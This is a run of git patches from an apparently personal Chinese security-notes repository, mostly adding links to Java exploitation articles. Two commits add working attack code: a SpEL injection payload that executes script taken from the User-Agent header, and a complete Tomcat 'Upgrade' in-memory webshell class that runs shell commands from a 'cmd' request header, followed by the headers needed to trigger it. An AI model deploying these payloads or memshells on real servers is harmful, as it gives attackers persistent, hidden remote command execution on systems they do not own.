@@ -1,5 +1,7 @@
# SPEL
+>new关键字大小写可以绕过
+
## poc
```java
@@ -45,6 +47,7 @@ T(org.springframework.cglib.core.ReflectUtils).defineClass('Singleton',T(com.sun
#{T(org.springframework.cglib.core.ReflectUtils).defineClass('Memshell',T(org.springframework.util.Base64Utils).decodeFromString('yv66vgAAA....'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject()}
+${''.getClass().forName('java.script.ScriptEngineManager').newInstance().getEngineByName("nashorn").eval(#request.getHeader('User-Agent'))}
echo
From aff8eaec8c511a05428772a3ea5701e0e3280d80 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Fri, 16 Sep 2022 17:10:08 +0800
Subject: [PATCH 040/257] Update Readme.md
---
shell/SPEL/Readme.md | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/shell/SPEL/Readme.md b/shell/SPEL/Readme.md
index 2e57962..b0acffd 100644
--- a/shell/SPEL/Readme.md
+++ b/shell/SPEL/Readme.md
@@ -111,7 +111,8 @@ print(')}')
其他bypass: https://xz.aliyun.com/t/9245
## 参考
-
+> https://xz.aliyun.com/t/9245 **可以使用#request.getRequestedSessionId() 或者 #request.getHeader('User-Agent') 反正可以使用request对象或者respose**
+>
>https://www.cnblogs.com/bitterz/p/15206255.html
>
>https://landgrey.me/blog/15/
From c337e11d2e0c3cb385652b8ee7fc35aefe7916af Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Fri, 16 Sep 2022 20:50:14 +0800
Subject: [PATCH 041/257] Create jetty
---
jetty | 5 +++++
1 file changed, 5 insertions(+)
create mode 100644 jetty
diff --git a/jetty b/jetty
new file mode 100644
index 0000000..aefe916
--- /dev/null
+++ b/jetty
@@ -0,0 +1,5 @@
+# jetty
+
+比较好的文章
+
+https://swarm.ptsecurity.com/tag/web-application-security/
From d160b9a1e472c722fb846f0c600ad772c9127601 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Fri, 16 Sep 2022 20:50:54 +0800
Subject: [PATCH 042/257] Delete jetty
---
jetty | 5 -----
1 file changed, 5 deletions(-)
delete mode 100644 jetty
diff --git a/jetty b/jetty
deleted file mode 100644
index aefe916..0000000
--- a/jetty
+++ /dev/null
@@ -1,5 +0,0 @@
-# jetty
-
-比较好的文章
-
-https://swarm.ptsecurity.com/tag/web-application-security/
From cca34aa995753884be80e17f29e1c4cabec07f9d Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Fri, 16 Sep 2022 20:51:25 +0800
Subject: [PATCH 043/257] Create Readme.md
---
Jetty/Readme.md | 5 +++++
1 file changed, 5 insertions(+)
create mode 100644 Jetty/Readme.md
diff --git a/Jetty/Readme.md b/Jetty/Readme.md
new file mode 100644
index 0000000..c036d30
--- /dev/null
+++ b/Jetty/Readme.md
@@ -0,0 +1,5 @@
+# Jetty
+
+好文章:
+
+https://swarm.ptsecurity.com/tag/web-application-security/
From cb7c7d5c7e9159c1e4979bb589bd9df5447430b3 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Fri, 16 Sep 2022 21:11:04 +0800
Subject: [PATCH 044/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index 28e3f61..2243d30 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -155,4 +155,5 @@
+ 2022/09/02 [代码审计之洞态IAST 0day挖掘](https://mp.weixin.qq.com/s/LDBwhQYiiZ8heOiJl83JFQ) **感觉一般**
+ 2022/09/10 [Groovy Template Engine Exploitation – Notes from a real case scenario](https://security.humanativaspa.it/groovy-template-engine-exploitation-notes-from-a-real-case-scenario/) **Groovy Template Engine Exploitation 说不定以后遇到**
+ 2022/09/10 [Xalan-J XSLT整数截断漏洞利用构造(CVE-2022-34169)](http://noahblog.360.cn/xalan-j-integer-truncation-reproduce-cve-2022-34169/) **好牛皮 但是看不懂**
-+ 2022/09/11 [通过动态链接库绕过反病毒软件Hook - Break JVM](https://mp.weixin.qq.com/s?__biz=MzA4NzQwNzY3OQ==&mid=2247483882&idx=1&sn=011c3f231d38d899bcf8bf21010616a0&chksm=9038acbaa74f25acd2983131a4b309424985fde3538cd8a93409336e317a4393350f75c7e334&scene=132#wechat_redirect)
++ 2022/09/11 [通过动态链接库绕过反病毒软件Hook - Break JVM](https://mp.weixin.qq.com/s?__biz=MzA4NzQwNzY3OQ==&mid=2247483882&idx=1&sn=011c3f231d38d899bcf8bf21010616a0&chksm=9038acbaa74f25acd2983131a4b309424985fde3538cd8a93409336e317a4393350f75c7e334&scene=132#wechat_redirect)
++ 2022/09/16 [研究 XSS 到 RCE 缺陷的开源应用程序](https://swarm.ptsecurity.com/researching-open-source-apps-for-xss-to-rce-flaws/) **xss->rce**
From 312f9323aa901d1543bd57e43078170e44420cf0 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Sat, 17 Sep 2022 23:36:50 +0800
Subject: [PATCH 045/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index 2243d30..add100f 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -157,3 +157,4 @@
+ 2022/09/10 [Xalan-J XSLT整数截断漏洞利用构造(CVE-2022-34169)](http://noahblog.360.cn/xalan-j-integer-truncation-reproduce-cve-2022-34169/) **好牛皮 但是看不懂**
+ 2022/09/11 [通过动态链接库绕过反病毒软件Hook - Break JVM](https://mp.weixin.qq.com/s?__biz=MzA4NzQwNzY3OQ==&mid=2247483882&idx=1&sn=011c3f231d38d899bcf8bf21010616a0&chksm=9038acbaa74f25acd2983131a4b309424985fde3538cd8a93409336e317a4393350f75c7e334&scene=132#wechat_redirect)
+ 2022/09/16 [研究 XSS 到 RCE 缺陷的开源应用程序](https://swarm.ptsecurity.com/researching-open-source-apps-for-xss-to-rce-flaws/) **xss->rce**
++ 2022/09/17 [JAVA反序列化中 RMI JRMP 以及JNDI多种利用方式详解](https://mp.weixin.qq.com/s/tAPCzt6Saq5q7W0P7kBdJg)
From 48ee10b76006bf6a2d01b6ab7242525ed0d92933 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Mon, 19 Sep 2022 00:21:26 +0800
Subject: [PATCH 046/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index add100f..6ac687a 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -158,3 +158,4 @@
+ 2022/09/11 [通过动态链接库绕过反病毒软件Hook - Break JVM](https://mp.weixin.qq.com/s?__biz=MzA4NzQwNzY3OQ==&mid=2247483882&idx=1&sn=011c3f231d38d899bcf8bf21010616a0&chksm=9038acbaa74f25acd2983131a4b309424985fde3538cd8a93409336e317a4393350f75c7e334&scene=132#wechat_redirect)
+ 2022/09/16 [研究 XSS 到 RCE 缺陷的开源应用程序](https://swarm.ptsecurity.com/researching-open-source-apps-for-xss-to-rce-flaws/) **xss->rce**
+ 2022/09/17 [JAVA反序列化中 RMI JRMP 以及JNDI多种利用方式详解](https://mp.weixin.qq.com/s/tAPCzt6Saq5q7W0P7kBdJg)
++ 2022/09/19 [冰蝎v4.0传输协议详解](https://mp.weixin.qq.com/s/EwY8if6ed_hZ3nQBiC3o7A)
From 5e790ec8cb65a3cae8b3bdfc0f2c3ca05355558f Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Tue, 20 Sep 2022 21:14:05 +0800
Subject: [PATCH 047/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index 6ac687a..25d842d 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -159,3 +159,4 @@
+ 2022/09/16 [研究 XSS 到 RCE 缺陷的开源应用程序](https://swarm.ptsecurity.com/researching-open-source-apps-for-xss-to-rce-flaws/) **xss->rce**
+ 2022/09/17 [JAVA反序列化中 RMI JRMP 以及JNDI多种利用方式详解](https://mp.weixin.qq.com/s/tAPCzt6Saq5q7W0P7kBdJg)
+ 2022/09/19 [冰蝎v4.0传输协议详解](https://mp.weixin.qq.com/s/EwY8if6ed_hZ3nQBiC3o7A)
++ 2022/09/20 [CVE-2022-26377: Apache HTTPd AJP Request Smuggling](http://noahblog.360.cn/apache-httpd-ajp-request-smuggling/) **好牛皮啊**
From bf60900e50187054bbc1e75c4a7cfd49a3d84dcf Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Fri, 23 Sep 2022 14:49:19 +0800
Subject: [PATCH 048/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index 25d842d..0b18a57 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -160,3 +160,4 @@
+ 2022/09/17 [JAVA反序列化中 RMI JRMP 以及JNDI多种利用方式详解](https://mp.weixin.qq.com/s/tAPCzt6Saq5q7W0P7kBdJg)
+ 2022/09/19 [冰蝎v4.0传输协议详解](https://mp.weixin.qq.com/s/EwY8if6ed_hZ3nQBiC3o7A)
+ 2022/09/20 [CVE-2022-26377: Apache HTTPd AJP Request Smuggling](http://noahblog.360.cn/apache-httpd-ajp-request-smuggling/) **好牛皮啊**
++ 2022/09/23 [cve-2010-4452 codebase 和code标签属性未检测同源策略导致任意代码执行漏洞](https://blog.csdn.net/instruder/article/details/7730905) **学习**
From 69cdaa189e2a401161c90c2efedf7332f94063fe Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Fri, 23 Sep 2022 23:55:38 +0800
Subject: [PATCH 049/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index 0b18a57..7c01619 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -161,3 +161,4 @@
+ 2022/09/19 [冰蝎v4.0传输协议详解](https://mp.weixin.qq.com/s/EwY8if6ed_hZ3nQBiC3o7A)
+ 2022/09/20 [CVE-2022-26377: Apache HTTPd AJP Request Smuggling](http://noahblog.360.cn/apache-httpd-ajp-request-smuggling/) **好牛皮啊**
+ 2022/09/23 [cve-2010-4452 codebase 和code标签属性未检测同源策略导致任意代码执行漏洞](https://blog.csdn.net/instruder/article/details/7730905) **学习**
++ 2022/09/23 [Java运行代码的效率怎么提高](https://blog.csdn.net/qf2019/article/details/109351547) [JAVA实现大文件多线程下载,提速30倍](https://blog.csdn.net/qq_19749625/article/details/120009749) **java效率提高**
From 92683e32d154813cc5b117fd4e73d8533c292f82 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Mon, 26 Sep 2022 13:22:52 +0800
Subject: [PATCH 050/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index 7c01619..4b5decd 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -162,3 +162,4 @@
+ 2022/09/20 [CVE-2022-26377: Apache HTTPd AJP Request Smuggling](http://noahblog.360.cn/apache-httpd-ajp-request-smuggling/) **好牛皮啊**
+ 2022/09/23 [cve-2010-4452 codebase 和code标签属性未检测同源策略导致任意代码执行漏洞](https://blog.csdn.net/instruder/article/details/7730905) **学习**
+ 2022/09/23 [Java运行代码的效率怎么提高](https://blog.csdn.net/qf2019/article/details/109351547) [JAVA实现大文件多线程下载,提速30倍](https://blog.csdn.net/qq_19749625/article/details/120009749) **java效率提高**
++ 2022/09/26 [一次老版本jboss反序列化漏洞的利用分析](https://mp.weixin.qq.com/s/7oyRYlNUJ4neAdDRkxL2Rg) **低版本的jboss 重挖,不错**
From 7bcef03b26b097d9127ca1c30aad7bcb92ea5f2d Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Mon, 26 Sep 2022 21:43:07 +0800
Subject: [PATCH 051/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index 4b5decd..0472cfa 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -163,3 +163,4 @@
+ 2022/09/23 [cve-2010-4452 codebase 和code标签属性未检测同源策略导致任意代码执行漏洞](https://blog.csdn.net/instruder/article/details/7730905) **学习**
+ 2022/09/23 [Java运行代码的效率怎么提高](https://blog.csdn.net/qf2019/article/details/109351547) [JAVA实现大文件多线程下载,提速30倍](https://blog.csdn.net/qq_19749625/article/details/120009749) **java效率提高**
+ 2022/09/26 [一次老版本jboss反序列化漏洞的利用分析](https://mp.weixin.qq.com/s/7oyRYlNUJ4neAdDRkxL2Rg) **低版本的jboss 重挖,不错**
++ 2022/09/26 [CS反制之批量伪装上线](https://forum.butian.net/share/708) **思路不错。**
From 4e56cffcd809587ee0af6bef615538f7ae9c04ea Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Mon, 26 Sep 2022 21:52:27 +0800
Subject: [PATCH 052/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index 0472cfa..83b5ca2 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -164,3 +164,4 @@
+ 2022/09/23 [Java运行代码的效率怎么提高](https://blog.csdn.net/qf2019/article/details/109351547) [JAVA实现大文件多线程下载,提速30倍](https://blog.csdn.net/qq_19749625/article/details/120009749) **java效率提高**
+ 2022/09/26 [一次老版本jboss反序列化漏洞的利用分析](https://mp.weixin.qq.com/s/7oyRYlNUJ4neAdDRkxL2Rg) **低版本的jboss 重挖,不错**
+ 2022/09/26 [CS反制之批量伪装上线](https://forum.butian.net/share/708) **思路不错。**
++ 2022/09/26 [浅谈JFinal的DenyAccessJsp绕过](https://forum.butian.net/share/1899) **路径绕过url编码**
From e0008a4e09a2b796f8e8a80c8cc61e0a63743879 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Thu, 29 Sep 2022 14:24:29 +0800
Subject: [PATCH 053/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index 83b5ca2..bfcb129 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -165,3 +165,4 @@
+ 2022/09/26 [一次老版本jboss反序列化漏洞的利用分析](https://mp.weixin.qq.com/s/7oyRYlNUJ4neAdDRkxL2Rg) **低版本的jboss 重挖,不错**
+ 2022/09/26 [CS反制之批量伪装上线](https://forum.butian.net/share/708) **思路不错。**
+ 2022/09/26 [浅谈JFinal的DenyAccessJsp绕过](https://forum.butian.net/share/1899) **路径绕过url编码**
++ 2022/09/29 [TCTF 2019 线上赛 web 题 writeup](https://www.k0rz3n.com/2019/04/04/TCTF%202019%20%E7%BA%BF%E4%B8%8A%E8%B5%9B%20web%20%E9%A2%98%20writeup/) [在Java EE Servers环境下利用Jolokia Agent漏洞](https://www.freebuf.com/vuls/166695.html)
From f68e12bfebc19e66aa810baddf4b01c788f00334 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Thu, 29 Sep 2022 16:43:40 +0800
Subject: [PATCH 054/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index bfcb129..2bec876 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -166,3 +166,4 @@
+ 2022/09/26 [CS反制之批量伪装上线](https://forum.butian.net/share/708) **思路不错。**
+ 2022/09/26 [浅谈JFinal的DenyAccessJsp绕过](https://forum.butian.net/share/1899) **路径绕过url编码**
+ 2022/09/29 [TCTF 2019 线上赛 web 题 writeup](https://www.k0rz3n.com/2019/04/04/TCTF%202019%20%E7%BA%BF%E4%B8%8A%E8%B5%9B%20web%20%E9%A2%98%20writeup/) [在Java EE Servers环境下利用Jolokia Agent漏洞](https://www.freebuf.com/vuls/166695.html)
++ 2022/9/29 [从JDBC attack到detectCustomCollations利用范围扩展](https://xz.aliyun.com/t/11610) **扩展思路**
From df9e765c02fd05924778fa091965a139e8dfa2d6 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Tue, 4 Oct 2022 18:18:28 +0800
Subject: [PATCH 055/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index 2bec876..61e5771 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -167,3 +167,4 @@
+ 2022/09/26 [浅谈JFinal的DenyAccessJsp绕过](https://forum.butian.net/share/1899) **路径绕过url编码**
+ 2022/09/29 [TCTF 2019 线上赛 web 题 writeup](https://www.k0rz3n.com/2019/04/04/TCTF%202019%20%E7%BA%BF%E4%B8%8A%E8%B5%9B%20web%20%E9%A2%98%20writeup/) [在Java EE Servers环境下利用Jolokia Agent漏洞](https://www.freebuf.com/vuls/166695.html)
+ 2022/9/29 [从JDBC attack到detectCustomCollations利用范围扩展](https://xz.aliyun.com/t/11610) **扩展思路**
++ 2022/10/04 [为什么预编译可以防止sql注入](https://m.php.cn/faq/418626.html) **预编译可以防止sql注入的原因:允许数据库做参数化查询。在使用参数化查询的情况下,数据库不会将参数的内容视为SQL执行的一部分,而是作为一个字段的属性值来处理,这样就算参数中包含破环性语句(or ‘1=1’)也不会被执行。**
From f22f680cf2aee58989104c6b2d2c4615e6475e21 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Wed, 5 Oct 2022 17:10:29 +0800
Subject: [PATCH 056/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index 61e5771..50449d7 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -168,3 +168,4 @@
+ 2022/09/29 [TCTF 2019 线上赛 web 题 writeup](https://www.k0rz3n.com/2019/04/04/TCTF%202019%20%E7%BA%BF%E4%B8%8A%E8%B5%9B%20web%20%E9%A2%98%20writeup/) [在Java EE Servers环境下利用Jolokia Agent漏洞](https://www.freebuf.com/vuls/166695.html)
+ 2022/9/29 [从JDBC attack到detectCustomCollations利用范围扩展](https://xz.aliyun.com/t/11610) **扩展思路**
+ 2022/10/04 [为什么预编译可以防止sql注入](https://m.php.cn/faq/418626.html) **预编译可以防止sql注入的原因:允许数据库做参数化查询。在使用参数化查询的情况下,数据库不会将参数的内容视为SQL执行的一部分,而是作为一个字段的属性值来处理,这样就算参数中包含破环性语句(or ‘1=1’)也不会被执行。**
++ 2022/10/05 [JavaMelody 漏洞](https://mp.weixin.qq.com/s?__biz=MzU1OTU3ODk0OQ==&mid=2247484382&idx=1&sn=bb8b97a74d99a5c361db431898a953d9&chksm=fc1469f4cb63e0e261e53faa8728ff57c72f5694034dda028d08904fe775fa1654f82cb690aa&scene=178&cur_album_id=2327370482917965825#rd)
From f4571ad0e360dbe2657a9d39c03b011de1313307 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Wed, 5 Oct 2022 19:58:43 +0800
Subject: [PATCH 057/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index 50449d7..b7a23e1 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -169,3 +169,4 @@
+ 2022/9/29 [从JDBC attack到detectCustomCollations利用范围扩展](https://xz.aliyun.com/t/11610) **扩展思路**
+ 2022/10/04 [为什么预编译可以防止sql注入](https://m.php.cn/faq/418626.html) **预编译可以防止sql注入的原因:允许数据库做参数化查询。在使用参数化查询的情况下,数据库不会将参数的内容视为SQL执行的一部分,而是作为一个字段的属性值来处理,这样就算参数中包含破环性语句(or ‘1=1’)也不会被执行。**
+ 2022/10/05 [JavaMelody 漏洞](https://mp.weixin.qq.com/s?__biz=MzU1OTU3ODk0OQ==&mid=2247484382&idx=1&sn=bb8b97a74d99a5c361db431898a953d9&chksm=fc1469f4cb63e0e261e53faa8728ff57c72f5694034dda028d08904fe775fa1654f82cb690aa&scene=178&cur_album_id=2327370482917965825#rd)
++ 2022/10/05 [一种新的Tomcat内存马 - Upgrade内存马](https://tttang.com/archive/1709)
From 351c10a9c59825a0a8150200a6a45494546e42d4 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Wed, 5 Oct 2022 21:23:33 +0800
Subject: [PATCH 058/257] Create Readme.md
---
.../Upgrade/Readme.md" | 92 +++++++++++++++++++
1 file changed, 92 insertions(+)
create mode 100644 "java\345\206\205\345\255\230\351\251\254/Upgrade/Readme.md"
diff --git "a/java\345\206\205\345\255\230\351\251\254/Upgrade/Readme.md" "b/java\345\206\205\345\255\230\351\251\254/Upgrade/Readme.md"
new file mode 100644
index 0000000..66f26f0
--- /dev/null
+++ "b/java\345\206\205\345\255\230\351\251\254/Upgrade/Readme.md"
@@ -0,0 +1,92 @@
+# Upgrade
+
+参考:https://tttang.com/archive/1709
+
+```java
+package com.example.demo;
+
+
+import org.apache.catalina.connector.Connector;
+import org.apache.catalina.connector.Request;
+import org.apache.catalina.connector.RequestFacade;
+import org.apache.coyote.Adapter;
+import org.apache.coyote.Processor;
+import org.apache.coyote.Response;
+import org.apache.coyote.UpgradeProtocol;
+import org.apache.coyote.http11.AbstractHttp11Protocol;
+import org.apache.coyote.http11.upgrade.InternalHttpUpgradeHandler;
+import org.apache.tomcat.util.net.SocketWrapperBase;
+import org.springframework.web.context.request.RequestContextHolder;
+import org.springframework.web.context.request.ServletRequestAttributes;
+
+import javax.servlet.http.HttpServletRequest;
+import java.lang.reflect.Field;
+import java.nio.ByteBuffer;
+import java.util.HashMap;
+
+public class UpgradeMemShell implements UpgradeProtocol {
+
+ public UpgradeMemShell() throws Exception{
+ HttpServletRequest request = ((ServletRequestAttributes) (RequestContextHolder.currentRequestAttributes())).getRequest();
+ RequestFacade rf = (RequestFacade) request;
+ Field requestField = RequestFacade.class.getDeclaredField("request");
+ requestField.setAccessible(true);
+ Request request1 = (Request) requestField.get(rf);
+
+ Field connector = Request.class.getDeclaredField("connector");
+ connector.setAccessible(true);
+ Connector realConnector = (Connector) connector.get(request1);
+
+ Field protocolHandlerField = Connector.class.getDeclaredField("protocolHandler");
+ protocolHandlerField.setAccessible(true);
+ AbstractHttp11Protocol handler = (AbstractHttp11Protocol) protocolHandlerField.get(realConnector);
+
+ HashMap upgradeProtocols = null;
+ Field upgradeProtocolsField = AbstractHttp11Protocol.class.getDeclaredField("httpUpgradeProtocols");
+ upgradeProtocolsField.setAccessible(true);
+ upgradeProtocols = (HashMap) upgradeProtocolsField.get(handler);
+ upgradeProtocols.put("http2.0", this);
+ upgradeProtocolsField.set(handler, upgradeProtocols);
+ System.out.println("success");
+ }
+
+ @Override
+ public String getHttpUpgradeName(boolean b) {
+ return null;
+ }
+
+ @Override
+ public byte[] getAlpnIdentifier() {
+ return new byte[0];
+ }
+
+ @Override
+ public String getAlpnName() {
+ return null;
+ }
+
+ @Override
+ public Processor getProcessor(SocketWrapperBase socketWrapperBase, Adapter adapter) {
+ return null;
+ }
+
+ @Override
+ public InternalHttpUpgradeHandler getInternalUpgradeHandler(Adapter adapter, org.apache.coyote.Request request) {
+ return null;
+ }
+
+ public boolean accept(org.apache.coyote.Request request) {
+ System.out.println("MyUpgrade.accept");
+ String p = request.getHeader("cmd");
+ try {
+ String[] cmd = System.getProperty("os.name").toLowerCase().contains("windows") ? new String[]{"cmd.exe", "/c", p} : new String[]{"/bin/sh", "-c", p};
+ Field response = org.apache.coyote.Request.class.getDeclaredField("response");
+ response.setAccessible(true);
+ Response resp = (Response) response.get(request);
+ byte[] result = new java.util.Scanner(new ProcessBuilder(cmd).start().getInputStream()).useDelimiter("\\A").next().getBytes();
+ resp.doWrite(ByteBuffer.wrap(result));
+ } catch (Exception e){}
+ return false;
+ }
+}
+```
From c5700834536524367770e550cb8302226bd601e0 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Wed, 5 Oct 2022 21:24:47 +0800
Subject: [PATCH 059/257] Update Readme.md
---
.../Upgrade/Readme.md" | 7 +++++++
1 file changed, 7 insertions(+)
diff --git "a/java\345\206\205\345\255\230\351\251\254/Upgrade/Readme.md" "b/java\345\206\205\345\255\230\351\251\254/Upgrade/Readme.md"
index 66f26f0..596af80 100644
--- "a/java\345\206\205\345\255\230\351\251\254/Upgrade/Readme.md"
+++ "b/java\345\206\205\345\255\230\351\251\254/Upgrade/Readme.md"
@@ -90,3 +90,10 @@ public class UpgradeMemShell implements UpgradeProtocol {
}
}
```
+
+使用
+```txt
+Upgrade: http2.o
+cmd: calc
+Connection: Upgrade
+```
From 7f0fb3b6b052194022eeb6ce759e6a25b37de401 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Thu, 6 Oct 2022 09:22:54 +0800
Subject: [PATCH 060/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index b7a23e1..b8bc2c3 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -170,3 +170,4 @@
+ 2022/10/04 [为什么预编译可以防止sql注入](https://m.php.cn/faq/418626.html) **预编译可以防止sql注入的原因:允许数据库做参数化查询。在使用参数化查询的情况下,数据库不会将参数的内容视为SQL执行的一部分,而是作为一个字段的属性值来处理,这样就算参数中包含破环性语句(or ‘1=1’)也不会被执行。**
+ 2022/10/05 [JavaMelody 漏洞](https://mp.weixin.qq.com/s?__biz=MzU1OTU3ODk0OQ==&mid=2247484382&idx=1&sn=bb8b97a74d99a5c361db431898a953d9&chksm=fc1469f4cb63e0e261e53faa8728ff57c72f5694034dda028d08904fe775fa1654f82cb690aa&scene=178&cur_album_id=2327370482917965825#rd)
+ 2022/10/05 [一种新的Tomcat内存马 - Upgrade内存马](https://tttang.com/archive/1709)
++ 2022/10/06 [HSQLDB 安全测试指南](https://b1ue.cn/archives/458.html)
From 7c2cd304788cb83e904b43ab71b57d177b0636a7 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Thu, 6 Oct 2022 15:57:15 +0800
Subject: [PATCH 061/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index b8bc2c3..3625db3 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -171,3 +171,4 @@
+ 2022/10/05 [JavaMelody 漏洞](https://mp.weixin.qq.com/s?__biz=MzU1OTU3ODk0OQ==&mid=2247484382&idx=1&sn=bb8b97a74d99a5c361db431898a953d9&chksm=fc1469f4cb63e0e261e53faa8728ff57c72f5694034dda028d08904fe775fa1654f82cb690aa&scene=178&cur_album_id=2327370482917965825#rd)
+ 2022/10/05 [一种新的Tomcat内存马 - Upgrade内存马](https://tttang.com/archive/1709)
